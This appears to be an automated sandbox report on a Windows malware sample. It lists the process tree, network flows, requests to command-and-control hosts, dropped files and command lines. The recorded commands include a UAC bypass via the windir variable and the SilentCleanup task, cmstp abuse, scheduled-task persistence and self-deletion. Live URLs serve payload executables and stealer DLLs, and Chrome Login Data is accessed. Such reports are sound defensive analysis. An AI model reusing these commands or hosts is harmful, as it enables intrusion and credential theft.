Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Aug. 9, 2021, 9:26 a.m. | Aug. 9, 2021, 9:42 a.m. |
-
-
-
GFDyrtucbvfdg.exe "C:\ProgramData\GFDyrtucbvfdg.exe"
1632
-
-
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /pid 2364 & erase C:\Users\test22\AppData\Roaming\DSFnbyhgfrtydfg.exe & RD /S /Q C:\\ProgramData\\499642249564258\\* & exit
2548-
taskkill.exe taskkill /pid 2364
2228
-
-
-
-
-
-
schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dCtjCu" /XML "C:\Users\test22\AppData\Local\Temp\tmp671A.tmp"
3724
-
-
-
-
-
reg.exe reg delete hkcu\Environment /v windir /f
3168 -
reg.exe reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "
3212 -
schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
3256
-
-
-
-
reg.exe reg delete hkcu\Environment /v windir /f
3572
-
-
-
-
-
cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\b3hfotbm.inf
3112
-
-
-
-
-
powershell.exe "powershell" Get-MpPreference -verbose
3088
-
-
-
-
-
schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
3404
-
-
-
cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\test22\AppData\Local\Temp\zxcv.EXE"
2440-
timeout.exe timeout /T 10 /NOBREAK
1756
-
-
-
-
explorer.exe C:\Windows\Explorer.EXE
1848
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49209 195.201.225.248:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=telecut.in | 1d:7b:94:0d:d6:f9:85:f3:66:74:d5:1d:98:0c:7a:28:5b:c0:62:44 |
TLSv1 192.168.56.101:49305 162.159.134.233:443 |
None | None | None |
TLSv1 192.168.56.101:49315 162.159.134.233:443 |
None | None | None |
TLSv1 192.168.56.101:49314 162.159.134.233:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da |
TLSv1 192.168.56.101:49304 162.159.134.233:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
file | C:\Program Files (x86)\Google\Chrome\Application\65.0.3325.181\libegl.dll |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome |
suspicious_features | POST method with no referer header | suspicious_request | POST http://danielmi.ac.ug/index.php | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header | suspicious_request | POST http://danielmax.ac.ug/softokn3.dll | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://74.119.195.134/ | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://74.119.195.134//l/f/K-R3vHoBagrSXdgRybk2/6ba72ceafccb01eee167d7aa09187085192abe6a | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header | suspicious_request | POST http://danielmax.ac.ug/sqlite3.dll | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header | suspicious_request | POST http://danielmax.ac.ug/freebl3.dll | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header | suspicious_request | POST http://danielmax.ac.ug/mozglue.dll | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header | suspicious_request | POST http://danielmax.ac.ug/msvcp140.dll | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header | suspicious_request | POST http://danielmax.ac.ug/nss3.dll | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header | suspicious_request | POST http://danielmax.ac.ug/vcruntime140.dll | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://74.119.195.134//l/f/K-R3vHoBagrSXdgRybk2/1e6e1f91bf2fd97f39bb3794f23f972b62daf99d | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header | suspicious_request | POST http://danielmax.ac.ug/main.php | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header | suspicious_request | POST http://danielmax.ac.ug/ | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://185.215.113.77/ac.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://185.215.113.77/rc.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://185.215.113.77/ds1.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://185.215.113.77/ds2.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://185.215.113.77/cc.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://telete.in/brikitiki |
request | POST http://danielmi.ac.ug/index.php |
request | POST http://danielmax.ac.ug/softokn3.dll |
request | POST http://74.119.195.134/ |
request | GET http://74.119.195.134//l/f/K-R3vHoBagrSXdgRybk2/6ba72ceafccb01eee167d7aa09187085192abe6a |
request | POST http://danielmax.ac.ug/sqlite3.dll |
request | POST http://danielmax.ac.ug/freebl3.dll |
request | POST http://danielmax.ac.ug/mozglue.dll |
request | POST http://danielmax.ac.ug/msvcp140.dll |
request | POST http://danielmax.ac.ug/nss3.dll |
request | POST http://danielmax.ac.ug/vcruntime140.dll |
request | GET http://74.119.195.134//l/f/K-R3vHoBagrSXdgRybk2/1e6e1f91bf2fd97f39bb3794f23f972b62daf99d |
request | POST http://danielmax.ac.ug/main.php |
request | POST http://danielmax.ac.ug/ |
request | GET http://185.215.113.77/ac.exe |
request | GET http://185.215.113.77/rc.exe |
request | GET http://185.215.113.77/ds1.exe |
request | GET http://185.215.113.77/ds2.exe |
request | GET http://185.215.113.77/cc.exe |
request | GET https://telete.in/brikitiki |
request | GET https://cdn.discordapp.com/attachments/873891971998036042/873892046249799720/Jjdsdprkpedcmpxtmnbemyveeqogpvi |
request | GET https://cdn.discordapp.com/attachments/873891971998036042/873892704155742258/Bdojytwvbcgagbvmwkdspythmuhhgvq |
request | POST http://danielmi.ac.ug/index.php |
request | POST http://danielmax.ac.ug/softokn3.dll |
request | POST http://74.119.195.134/ |
request | POST http://danielmax.ac.ug/sqlite3.dll |
request | POST http://danielmax.ac.ug/freebl3.dll |
request | POST http://danielmax.ac.ug/mozglue.dll |
request | POST http://danielmax.ac.ug/msvcp140.dll |
request | POST http://danielmax.ac.ug/nss3.dll |
request | POST http://danielmax.ac.ug/vcruntime140.dll |
request | POST http://danielmax.ac.ug/main.php |
request | POST http://danielmax.ac.ug/ |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\QuotaManager-journal |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlSoceng.store |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\kn |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ms\messages.json |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.2_0\_locales\pt_PT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.2_0\_locales\ru\messages.json |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_1 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_0 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Crashpad\metadata |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\LOCK |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ro\messages.json |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\MANIFEST-000001 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\pl |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\he\messages.json |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.2_0\manifest.json |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_metadata\verified_contents.json |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\7619.603.0.2_0\_locales\ja |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\LOG |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\da\messages.json |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\7619.603.0.2_0\_locales\zh_TW\messages.json |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\zh_TW\messages.json |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Thumbnails\LOG.old |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Translate Ranker Model |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\fil |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\hi\messages.json |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\fil |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\7619.603.0.2_0\_locales\mr\messages.json |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\de |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\da |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.2_0\_locales\uk\messages.json |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Storage |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sl |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sl\messages.json |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\ta |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\es_419 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\te |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.2_0\_locales\tr\messages.json |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\th |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\7619.603.0.2_0\_locales\zh\messages.json |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\pt_PT\messages.json |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.2_0\_locales\id\messages.json |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\tr |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\open1.png.lnk |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-synch-l1-2-0.dll |
file | C:\ProgramData\vcruntime140.dll |
file | C:\Users\Public\Libraries\Jjdsdpr\Jjdsdpr.exe |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-util-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-file-l2-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\libEGL.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\msvcp140.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-locale-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\4tWOdlbY5p.exe |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-time-l1-1-0.dll |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\open.PNG.lnk |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\AccessibleMarshal.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\nssckbi.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\mozMapi32.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\nssdbm3.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\MapiProxy_InUse.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-string-l1-1-0.dll |
file | C:\Users\test22\AppData\Roaming\dCtjCu.exe |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\softokn3.dll |
file | C:\Users\test22\AppData\Roaming\DSFnbyhgfrtydfg.exe |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-file-l1-2-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-string-l1-1-0.dll |
file | C:\ProgramData\sqlite3.dll |
file | C:\Users\test22\AppData\Local\Temp\V6QfXKl0VE.exe |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-process-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\MapiProxy.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-processenvironment-l1-1-0.dll |
file | C:\Users\Public\nest.bat |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\IA2Marshal.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-synch-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\AccessibleHandler.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-libraryloader-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-timezone-l1-1-0.dll |
file | C:\ProgramData\nss3.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-interlocked-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-processthreads-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\qipcap.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\ldif60.dll |
file | C:\Users\Public\KDECO.bat |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-filesystem-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-multibyte-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-profile-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\mozglue.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\ucrtbase.dll |
file | C:\Users\test22\AppData\Local\Temp\crS9EKo8sM.exe |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-runtime-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-namedpipe-l1-1-0.dll |
file | C:\Users\Public\Libraries\Bdojytw\Bdojytw.exe |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Performance Monitor.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\agent.pyw.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\click.txt.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Component Services.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Python 2.7\Python Manuals.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\open.PNG.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sound Recorder.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Narrator.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\util.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Settings.ini.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office Access 2007.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Wordpad.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HttpWatch Professional Edition\Automation Examples.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Chrome.lnk |
file | C:\Users\test22\Links\Desktop.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Fax and Scan.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HttpWatch Professional Edition\HttpWatch Automation Reference.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\GameExplorer.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XPS Viewer.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Command Prompt.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Python 2.7\Module Docs.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EditPlus.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Security Configuration Management.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Control Panel.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE (x86).lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Welcome Center.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip\7-Zip File Manager.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip\7-Zip Help.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Mobility Center.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\About Java.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\Get Help.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Math Input Panel.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HttpWatch Professional Edition\HttpWatch Studio.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\System Restore.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Windows Easy Transfer Reports.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Resource Monitor.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Private Character Editor.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office Publisher 2007.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Memory Diagnostics Tool.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Character Map.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\Visit Java.com.lnk |
cmdline | C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat |
cmdline | "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dCtjCu" /XML "C:\Users\test22\AppData\Local\Temp\tmp671A.tmp" |
cmdline | /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\sqlcmd.exe" |
cmdline | schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I |
cmdline | cmd.exe /c taskkill /pid 2364 & erase C:\Users\test22\AppData\Roaming\DSFnbyhgfrtydfg.exe & RD /S /Q C:\\ProgramData\\499642249564258\\* & exit |
cmdline | cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\test22\AppData\Local\Temp\zxcv.EXE" |
cmdline | schtasks.exe /Create /TN "Updates\dCtjCu" /XML "C:\Users\test22\AppData\Local\Temp\tmp671A.tmp" |
cmdline | "powershell" Get-MpPreference -verbose |
cmdline | "C:\Windows\System32\cmd.exe" /c taskkill /pid 2364 & erase C:\Users\test22\AppData\Roaming\DSFnbyhgfrtydfg.exe & RD /S /Q C:\\ProgramData\\499642249564258\\* & exit |
file | C:\ProgramData\GFDyrtucbvfdg.exe |
file | C:\Users\test22\AppData\Roaming\DSFnbyhgfrtydfg.exe |
file | C:\Users\test22\AppData\Local\Temp\zxcv.EXE |
file | C:\Users\test22\AppData\Local\Temp\4tWOdlbY5p.exe |
file | C:\Users\test22\AppData\Local\Temp\crS9EKo8sM.exe |
file | C:\Users\test22\AppData\Local\Temp\V6QfXKl0VE.exe |
file | C:\Users\test22\AppData\Local\Temp\Y9vZMbEz1g.exe |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-synch-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\4tWOdlbY5p.exe |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-file-l2-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-locale-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\breakpadinjector.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\prldap60.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-private-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\nss3.dll |
file | C:\Users\test22\AppData\Roaming\DSFnbyhgfrtydfg.exe |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-namedpipe-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\mozglue.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-libraryloader-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\softokn3.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-environment-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\V6QfXKl0VE.exe |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\MapiProxy.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\IA2Marshal.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-heap-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-time-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-math-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-string-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-memory-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-sysinfo-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-util-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\crS9EKo8sM.exe |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-localization-l1-2-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-processthreads-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-filesystem-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-stdio-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\AccessibleHandler.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\qipcap.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-utility-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-processthreads-l1-1-1.dll |
file | C:\Users\test22\AppData\Local\Temp\zxcv.EXE |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-heap-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\sqlite3.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll |
